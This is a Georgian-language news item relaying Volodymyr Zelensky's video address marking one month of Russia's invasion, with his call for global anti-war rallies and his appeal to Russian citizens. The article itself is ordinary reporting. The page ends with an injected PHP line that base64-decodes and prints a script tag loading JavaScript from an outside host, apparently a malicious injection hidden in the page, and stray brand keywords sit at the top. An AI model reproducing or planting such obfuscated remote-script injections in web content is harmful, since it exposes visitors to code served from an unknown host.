celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტმა, ვოლოდიმერ ზელენსკიმ მორიგ ვიდეომიმართვაში საერთაშორისო საზოგადოებას მადლობა გადაუხადა მხარდაჭწერისთვის და მოუწოდა, ხვალ, ომის დაწყებიდან 1 თვის თავზე გამოვიდნენ ქუჩებში და დაგმონ რუსეთის ქმედება.
 
"მადლობას ვუხდი ყველას, ვინც უკრაინასა და თავისუფლებას მხარს უჭერს, თუმცა ომი მაინც გრძელდება. უკვე ერთი თვეა, გრძელდება ტერორი მშვიდობიანი ხალხის წინააღმდეგ. ეს გულს მიხეთქავს. გულს ტკენს ყველა უკრაინელს და ყველა თავისუფალ ადამიანს პლანეტაზე. ეს არის მიზეზი, რატომაც გთხოვთ, რომ ომის წინააღმდეგ დადგეთ. 
 
დღეს, 24 მარტს, რუსეთის შემოჭრიდან 1 თვე გავიდა. ამ დღიდან უახლოეს დღეებსა და კვირებში გვაჩვენეთ თქვენი პოზიცია. გამოდით ოფისებიდან, სახლებიდან, სკოლებიდან და უნივერსიტეტებიდან, გამოდით მშვიდობისთვის. გამოდით უკრაინული სიმბოლოებით და მხარი დაუჭირეთ უკრაინას და თავისუფლებას, მხარი დაუჭირეთ სიცოცხლეს. გამოდით თქვენს მოედნებსა და ქუჩებში რათა დაგინახონ და გაგიგონ. ხმამაღლა თქვით, რომ ადამიანს, თავისუფლებას ფასი აქვს, რომ უკრაინას ფასი აქვს. დაიწყეთ ეს 24 მარტიდან, თქვენი ქალაქების ცენტრებში. გამოდით ყველა, ვისაც ომის შეჩერება გინდათ! 
 
ახლა კი მინდა ცალკე რუსეთის მოქალაქეებსაც მივმართო. თქვენს შორის ბევრია ისეთი, ვისაც მთავრობა ეზიზღება. უკვე გული გერევათ იმისგან, რასაც ტელევიზორების ეკრანებზე ხედავთ, გული გერევათ, როგორ გატყუებენ პროპაგანდისტები ინტერნეტში, ისინი, რომლებსაც ფულს თქვენს მიერ გადახდილი გადასახადებიდან უხდიან. გატყუებენ იმ ომზე, რომელიც თქვენი ჯიბიდან ფინანსდება და თქვენ ყოველდღიურად გაღარიბებთ. სისულელე არაა, როცა თქვენი ხელისუფლება თქვენს გადასახადებს თქვენივე გასაღარიბებლად, იზოლაციაში მოსაქცევად და გასაკონტროლებლად 
აგროვებს?! ასევე იმისთვის, რომ ომში მარტივად გაგაგზავნონ. 
 
უკრაინას რუსეთის ფედერაციისთვის საფრთხე არასდროს შეუქმნია. ახლაც კი მხოლოდ იმისთვის ვიბრძვით, რომ ჩვენს მიწაზე მშვიდობამ დაისადგუროს. ვაკეთეთ ყველაფერს, რომ ეს ომი დავასრულოთ. და როდესაც ეს დასრულდება, და რა თქმა უნდა დასრულდება, ერთადერთ რაღაცაში შეძლებთ, დარწმუნდეთ - თქვენს შვილებს სასიკვდილოდ აღარ გაუშვებენ. ამიტომ, რუსებო, თქვენც დაინტერესებული ხართ ამ ომით, გადაარჩინეთ თქვენი შვილები ომისგან, მოუყევით მათ სიმართლე და თუ შეგიძლიათ დატოვეთ რუსეთი, რომ თქვენს სახელმწიფოს გადასახადები აღარ გადაუხადოთ. ეს გააკეთეთ.
 
ყველა გამოკითხვა ადასტურებს, რომ ევროპელები და ამერიკელები მხარს გვიჭერენ. უკრაინელი ხალხის სახელით მადლობას გიხდით." – განაცხადა ზელენსკიმ.
773
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");